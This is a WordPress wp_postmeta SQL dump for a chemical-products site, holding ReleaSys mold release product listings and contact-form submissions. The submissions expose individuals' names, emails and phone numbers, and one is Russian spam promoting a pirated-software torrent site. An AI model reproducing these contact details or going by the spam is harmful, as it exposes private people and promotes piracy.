INSERT INTO `wp_postmeta` VALUES (39338, 4590, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39339, 4590, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39340, 4590, '_field_1', 'Kevin Costa'); 
INSERT INTO `wp_postmeta` VALUES (39341, 4590, '_field_10', 'GLOBAL SAFETY MANAGEMENT'); 
INSERT INTO `wp_postmeta` VALUES (39342, 4590, '_field_2', 'SDS.update@gsmsds.com'); 
INSERT INTO `wp_postmeta` VALUES (39343, 4590, '_field_8', '(302) 597-9182'); 
INSERT INTO `wp_postmeta` VALUES (39344, 4590, '_field_3', 'Dear Sir/Madam.\r\n\r\n\r\nI am looking to obtain the latest [Material] Safety Data Sheet, which I was not able to locate on your website.The product is:\r\n \r\nI would like to request of the following (M)SDS: \r\n \r\nProduct Name(s): \r\n\r\n1.	MS-262 Safezone Cleaner for Plastic, Glass &amp; Metal\r\n\r\n        \r\nFor general questions regarding this request, please feel free to contact  - Kevin Costa at (302-597-9182) for any additional details.\r\n\r\nAny additional information you can provide, similar to that listed below, would be appreciated:\r\nChange in Product Name\r\nChange in Product Number\r\nChange in Chemical Makeup of same product name/number\r\nDiscontinued\r\nNo longer the manufacturer – New Manufacturer if known\r\n\r\nPlease email them to SDS.update@gsmsds.com or fax to 1-907-782-4120.\r\n\r\nIf the documents must be mailed please send to:\r\n\r\nGLOBAL SAFETY MANAGEMENT \r\n29144 Chapel Park Drive\r\nWesley Chapel, FL 33543\r\n\r\nI,(GSM) thanks you in advance for your prompt attention to this (M)SDS request.\r\n \r\nThank you for your time and assistance,\r\n\r\nKevin Costa\r\n302-597-9182'); 
INSERT INTO `wp_postmeta` VALUES (39345, 4590, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39346, 4590, '_sub_id', '4590'); 
INSERT INTO `wp_postmeta` VALUES (39347, 4578, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (39348, 4578, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (39349, 4578, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (39350, 4593, '_edit_lock', '1498438104:3'); 
INSERT INTO `wp_postmeta` VALUES (39351, 4593, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (39352, 4332, '_wp_attachment_backup_sizes', 'a:8:{s:9:"full-orig";a:3:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:26:"shutterstock_568596037.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:34:"shutterstock_568596037-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:34:"shutterstock_568596037-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:34:"shutterstock_568596037-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:30:"display_product_thumbnail-orig";a:4:{s:4:"file";s:34:"shutterstock_568596037-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:34:"shutterstock_568596037-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:34:"shutterstock_568596037-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:34:"shutterstock_568596037-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (39353, 4593, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (39354, 4593, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (39355, 4593, '_thumbnail_id', '4332'); 
INSERT INTO `wp_postmeta` VALUES (39356, 4593, '312_default_editor', '<strong>Physical Properties:</strong>\r\n<table width="385">\r\n<tbody>\r\n<tr>\r\n<td width="111">Primary Polymer</td>\r\n<td width="159">Polysiloxane</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td>Milky Solution</td>\r\n</tr>\r\n<tr>\r\n<td>Odor</td>\r\n<td>Alcohol</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td>0.88 g/mL</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point</td>\r\n<td>&lt; 50 C</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (39357, 4593, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (39358, 4593, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (39359, 4593, '317_default_editor', 'One Gallon, 5 Gallon, 55 Gallon Drum, 275 Gallon totes'); 
INSERT INTO `wp_postmeta` VALUES (39360, 4593, '716_default_editor', '<strong>Release Agent Applications:</strong>\r\n\r\nReleaSys 7300 is formulated to provide unmatched utility in low temperature compression, injection and transfer molding with the following materials. <a href="https://www.miller-stephenson.com/troubleshooting-common-molding-issues/">For help with application or troubleshooting concerns while using ReleaSys.</a>\r\n<table width="640">\r\n<tbody>\r\n<tr>\r\n<td width="167">•       Organic Polymers</td>\r\n<td width="168">•          Thermoplastics</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       Thermosetting resins</td>\r\n<td width="168">•          Acrylics</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       FRP Composites</td>\r\n<td width="168">•          Epoxies</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       Non-gel Polyester</td>\r\n<td width="168">•          Polyurethane / TPU</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•       Exothermic Polymers</td>\r\n<td width="168">•          Adhesives</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (39361, 4593, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (39362, 4593, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (39363, 4593, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (39364, 4593, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (39365, 4593, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (39366, 4593, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (39367, 4593, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (39368, 4593, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (39369, 4593, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (39370, 4593, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (39371, 4593, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (39372, 4593, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (39373, 4593, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (39374, 4593, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (39375, 4593, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (39376, 4593, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (39377, 4593, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (39378, 4593, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (39379, 4593, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (39380, 4593, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (39381, 4593, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (39382, 4593, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (39383, 4593, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (39384, 4593, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (39385, 4593, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (39386, 4593, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (39387, 4593, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (39388, 4593, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (39389, 4593, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (39390, 4593, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (39391, 4593, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (39392, 4593, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (39393, 4593, '_ywtm_content_tab_description', '<h2>ReleaSys™ 7300 | Thermoplastic Mold Release Agent</h2>\r\n<h3>Superior Durability; Rapid Cure; Ideal for Rapid, High Output Molding Operations</h3>\r\nReleaSys™ 7300 Thermoplastic Mold Release Agent is a semi-permanent mold release agent designed to provide superior durability and surface adhesion in cold molding operations. Utilization of a proprietary release agent and solvent system rapidly accelerates the drying and cure process allowing fast reapplication internals.  Properly applied, our product develops a durable, thin-film on the mold surface with minimal build-up.  This product binds tenaciously to the mold surface to provide extended re-application intervals on room temperature and chilled mold surfaces. ReleaSys 7300 Thermoplastic Mold Release Agent is particular effective on all thermosetting and thermoplastics as well as polyurethane foams, resins, and RIM molding operations  Benefits include:\r\n<ul>\r\n 	<li>Rapid cure: No heating required</li>\r\n 	<li>Highly-effective on Room Temp / Chilled molds</li>\r\n 	<li>Exceptional durability and surface adhesion</li>\r\n 	<li>Clean; Non-oily; Non-migrating</li>\r\n 	<li>No post-molding cleaning required</li>\r\n</ul>\r\n<h3>High-Performance Thermosetting / Thermoplastic Mold Release Agent</h3>\r\n&nbsp;\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (39394, 4593, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (39395, 4593, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (39396, 4593, '_yoast_wpseo_primary_product_cat', '526'); 
INSERT INTO `wp_postmeta` VALUES (39397, 4593, '_yoast_wpseo_focuskw_text_input', 'Thermoplastic Mold Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (39398, 4593, '_yoast_wpseo_focuskw', 'Thermoplastic Mold Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (39399, 4593, '_yoast_wpseo_title', 'Thermoplastic Mold Release Agent | ReleaSys 7300 | Miller-Stephenson'); 
INSERT INTO `wp_postmeta` VALUES (39400, 4593, '_yoast_wpseo_metadesc', 'ReleaSys 7300 Thermoplastic Mold Release Agent is designed to provide superior durability and throughput for high output plastic molding operations.'); 
INSERT INTO `wp_postmeta` VALUES (39401, 4593, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (39402, 4593, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (39403, 4593, '_yoast_wpseo_linkdex', '96'); 
INSERT INTO `wp_postmeta` VALUES (39404, 4596, '_wp_attached_file', '2017/06/ReleaSys-7300.pdf'); 
INSERT INTO `wp_postmeta` VALUES (39405, 4593, '318_custom_list_file', 'a:1:{s:32:"fd5b4460a17bb5a3b05dc0363eda4775";a:3:{s:4:"name";s:17:"ReleaSys 7300 TDS";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2017/06/ReleaSys-7300.pdf";s:4:"desc";s:17:"ReleaSys 7300 TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (39406, 4597, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39407, 4597, '_seq_num', '733'); 
INSERT INTO `wp_postmeta` VALUES (39408, 4597, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39409, 4597, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39410, 4597, '_field_1', 'David Anderson'); 
INSERT INTO `wp_postmeta` VALUES (39411, 4597, '_field_10', 'Vyaire Medical'); 
INSERT INTO `wp_postmeta` VALUES (39412, 4597, '_field_2', 'David.anderson@carefusion.com'); 
INSERT INTO `wp_postmeta` VALUES (39413, 4597, '_field_8', '(714) 922-7583'); 
INSERT INTO `wp_postmeta` VALUES (39414, 4597, '_field_3', 'Does Krytox MS3200-3270MD documentation exist to be ROHS compliant?'); 
INSERT INTO `wp_postmeta` VALUES (39415, 4597, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39416, 4597, '_sub_id', '4597'); 
INSERT INTO `wp_postmeta` VALUES (39417, 4602, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39418, 4602, '_seq_num', '734'); 
INSERT INTO `wp_postmeta` VALUES (39419, 4602, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39420, 4602, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39421, 4602, '_field_1', 'GregoryvonLE'); 
INSERT INTO `wp_postmeta` VALUES (39422, 4602, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (39423, 4602, '_field_2', 'dddddd@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (39424, 4602, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (39425, 4602, '_field_3', 'Сайт &lt;b&gt;n-torrents.ru&lt;/b&gt; может считаться примером наиболее качественного русскоязычного торрент-портала на котором вы всегда можете найти популярные игры, программы для ПК и &lt;a href=&quot;http://n-torrents.ru/load/pc_games/rpg/the_elder_scrolls_v_skyrim_legendary_edition_v1_9_32_0_8_2013_pc_russkij_124_repack_ot_r_g_mekhaniki/9-1-0-23054&quot;&gt;skyrim torrent&lt;/a&gt; . Благодаря продуманной работе команды администраторов портала, на нём нет раздач, которые содержат руткиты и вирусы, так что вы можете просто не бояться за безопасность информации на вашем ПК. Каждый файл, что доступен на трекере, получает тщательное описание автора, так что все пользователи смогут получить полную информацию о указанном контенте, еще до принятии решения о скачивании. \r\n \r\nКроме всего сказанного выше, торрент-трекер n-torrents выгодно отличается от аналогов огромным числом антикварных раздач, которых фактически нет на других порталах похожей тематики. Ценные, но не популярные раздачи поддерживаются командой, а поэтому вы сумеете сможете получить доступ к потребовавшемуся контенту. Еще этот трекер выступает в ипостаси агрегатора раздач с других популярных сайтов, дабы все люди смогли получать актуальный контент не покидая сайта. \r\n \r\nВ последние шесть лет правления разных стран активно сражаются со свободным файлообменом, ограничивая доступ к разным сайтам. Если вы решите стать постоянным пользователем ресурса n-torrents, вы всегда будете получить доступ к интересным фильмам и игрушкам, благодаря наличию у ресурса нового приложения для мобильных устройств, которое будет нормально работать не смотря ни на какие технические ограничения.'); 
INSERT INTO `wp_postmeta` VALUES (39426, 4602, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39427, 4602, '_sub_id', '4602'); 
INSERT INTO `wp_postmeta` VALUES (39428, 4603, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39429, 4603, '_seq_num', '735'); 
INSERT INTO `wp_postmeta` VALUES (39430, 4603, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39431, 4603, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39432, 4603, '_field_1', 'joseph k'); 
INSERT INTO `wp_postmeta` VALUES (39433, 4603, '_field_10', 'heemankshi bakers pvt ltd'); 
INSERT INTO `wp_postmeta` VALUES (39434, 4603, '_field_2', 'sourcing@heemankshi.com'); 
INSERT INTO `wp_postmeta` VALUES (39435, 4603, '_field_8', '(939) 456-1655'); 
INSERT INTO `wp_postmeta` VALUES (39436, 4603, '_field_3', 'Dear sir,\r\n              We have requirement of krytox corrugator grease 227 fg – 4 kgs  ,pl send best quote.\r\n \r\nJoseph k \r\nHeemankshi Bakers Pvt.Ltd\r\n9394561655'); 
INSERT INTO `wp_postmeta` VALUES (39437, 4603, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39438, 4603, '_sub_id', '4603'); 
INSERT INTO `wp_postmeta` VALUES (39439, 4604, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39440, 4604, '_seq_num', '736'); 
INSERT INTO `wp_postmeta` VALUES (39441, 4604, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39442, 4604, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39443, 4604, '_field_1', 'Jon Hall'); 
INSERT INTO `wp_postmeta` VALUES (39444, 4604, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (39445, 4604, '_field_2', 'jon@redrivertransportation.com'); 
INSERT INTO `wp_postmeta` VALUES (39446, 4604, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (39447, 4604, '_field_3', 'Hello,\n\n            My name is Jonathon Hall. I&#039;m the Logistics Manager at Red River Transportation Inc. We are a very highly accredited trucking brokerage company with several thousand trucks. We can haul your freight at a great rate to help save you money. But along with the rate we provide the best customer service in the industry. We take care of all the details that make sure your shipments are on time &amp; no damages. We have state of the art shipment tracking and can give you location update on your load at any time. Also you are provided an email sent to you as soon as the load is delivered. We specialize in Flatbed ,Van, and Step-deck shipments. Give me a chance to prove this to you and show you all that Red River Transportation Inc. can do for your business. Do you have any Incoming or Outgoing loads that I can work up a quote for you and begin to represent all that my company can do for you. I look forward to getting the chance to work with you, please have a nice day.\n'); 
INSERT INTO `wp_postmeta` VALUES (39448, 4604, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39449, 4604, '_sub_id', '4604'); 
INSERT INTO `wp_postmeta` VALUES (39450, 4605, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (39451, 4605, '_seq_num', '319'); 
INSERT INTO `wp_postmeta` VALUES (39452, 4605, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39453, 4605, '_field_12', 'Craig Whittle'); 
INSERT INTO `wp_postmeta` VALUES (39454, 4605, '_field_13', 'S&amp;C Electric Canada Ltd.'); 
INSERT INTO `wp_postmeta` VALUES (39455, 4605, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (39456, 4605, '_field_14', 'craig.whittle@sandc.com'); 
INSERT INTO `wp_postmeta` VALUES (39457, 4605, '_field_15', '(416) 249-9171'); 
INSERT INTO `wp_postmeta` VALUES (39458, 4605, '_field_16', 'I would like to know if Epikure W is equivalent to Armstrong Activator W curing agent? I also need technical data to back this up. It will be used with Epon Resin 828.'); 
INSERT INTO `wp_postmeta` VALUES (39459, 4605, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (39460, 4605, '_sub_id', '4605'); 
INSERT INTO `wp_postmeta` VALUES (39461, 4606, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (39462, 4606, '_seq_num', '737'); 
INSERT INTO `wp_postmeta` VALUES (39463, 4606, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (39464, 4606, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (39465, 4606, '_field_1', 'Sylvia'); 
INSERT INTO `wp_postmeta` VALUES (39466, 4606, '_field_10', 'PT. Mandiri Jaya Lubrindo'); 
INSERT INTO `wp_postmeta` VALUES (39467, 4606, '_field_2', 'mandirijaya.lubrindo@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (39468, 4606, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (39469, 4606, '_field_3', 'Dear Sir/Madam,\nWe interested to your product Krytox Lubricant.\nCould you please inform us how if we want to order for this Krytox Lubricant?\nWe need to supply this Krytox Lubricant to Plastic Flexible Factories in Indonesia.\nWaiting for your soonest reply..\nThank you.\nRegards,\nSylvia'); 
INSERT INTO `wp_postmeta` VALUES (39470, 4606, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (39471, 4606, '_sub_id', '4606'); 
INSERT INTO `wp_postmeta` VALUES (39472, 4607, '_edit_lock', '1497898778:3'); 
INSERT INTO `wp_postmeta` VALUES (39473, 4607, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (39474, 4608, '_wp_attached_file', '2017/06/shutterstock_596377658-e1497895977396.jpg'); 
INSERT INTO `wp_postmeta` VALUES (39475, 4608, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:885;s:6:"height";i:610;s:4:"file";s:49:"2017/06/shutterstock_596377658-e1497895977396.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:49:"shutterstock_596377658-e1497895977396-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:49:"shutterstock_596377658-e1497895977396-800x551.jpg";s:5:"width";i:800;s:6:"height";i:551;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:49:"shutterstock_596377658-e1497895977396-768x529.jpg";s:5:"width";i:768;s:6:"height";i:529;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:49:"shutterstock_596377658-e1497895977396-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:49:"shutterstock_596377658-e1497895977396-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:49:"shutterstock_596377658-e1497895977396-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:49:"shutterstock_596377658-e1497895977396-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (39476, 4608, '_wp_attachment_backup_sizes', 'a:8:{s:9:"full-orig";a:3:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:26:"shutterstock_596377658.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:34:"shutterstock_596377658-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:34:"shutterstock_596377658-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:34:"shutterstock_596377658-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:30:"display_product_thumbnail-orig";a:4:{s:4:"file";s:34:"shutterstock_596377658-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:34:"shutterstock_596377658-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:34:"shutterstock_596377658-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:34:"shutterstock_596377658-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (39477, 4607, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (39478, 4607, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (39479, 4607, '_thumbnail_id', '4608'); 
INSERT INTO `wp_postmeta` VALUES (39480, 4607, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (39481, 4607, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (39482, 4607, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (39483, 4607, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (39484, 4607, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (39485, 4607, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (39486, 4607, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (39487, 4607, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (39488, 4607, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (39489, 4607, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (39490, 4607, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (39491, 4607, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (39492, 4607, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (39493, 4607, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (39494, 4607, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (39495, 4607, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (39496, 4607, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (39497, 4607, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (39498, 4607, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (39499, 4607, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (39500, 4607, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (39501, 4607, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (39502, 4607, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (39503, 4607, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (39504, 4607, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (39505, 4607, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (39506, 4607, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (39507, 4607, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (39508, 4607, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (39509, 4607, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (39510, 4607, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (39511, 4607, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (39512, 4607, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (39513, 4607, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (39514, 4607, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (39515, 4607, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (39516, 4607, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (39517, 4607, '_ywtm_content_tab_description', '<h2>ReleaSys HTF | High Temperature Mold Release</h2>\r\n<h3>Advanced DryFilm Chemistry; Ideal for High-Temperature Composites; High Lubricity</h3>\r\nReleaSys HTF High Temperature Mold Release is a highly advanced, water-based release agent designed to exhibit exceptional release of all substrates from room temperature up to 750° F.  ReleaSys HTF develops a highly lubricious and dry film on the mold surface, offering extended reapplication intervals and no costly transfer. Designed to meet the demands of the advanced composite and elastomer manufacturing industries, this high temperature mold release utilizes sophisticated fluoropolymer  technology required for process that require long cure times at elevated temperatures. ReleaSys HTF are designed for all high performance substrates used in compression molding, resin transfer, rubber / elastomer vulcanization, vacuum bagging, filament-winding, mandrel-built, hand and spray layup processes. Benefits include:\r\n<ul>\r\n 	<li>Exceptional Lubricity and Ease of Release</li>\r\n 	<li>Ideal for Advanced Composites and Elastomers</li>\r\n 	<li>Heat Stable to 750 ° F</li>\r\n 	<li>Numerous Releases per Application</li>\r\n 	<li>Water-based; No VOC; no odor</li>\r\n</ul>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (39518, 4607, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (39519, 4607, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (39520, 4607, '_yoast_wpseo_primary_product_cat', '20'); 
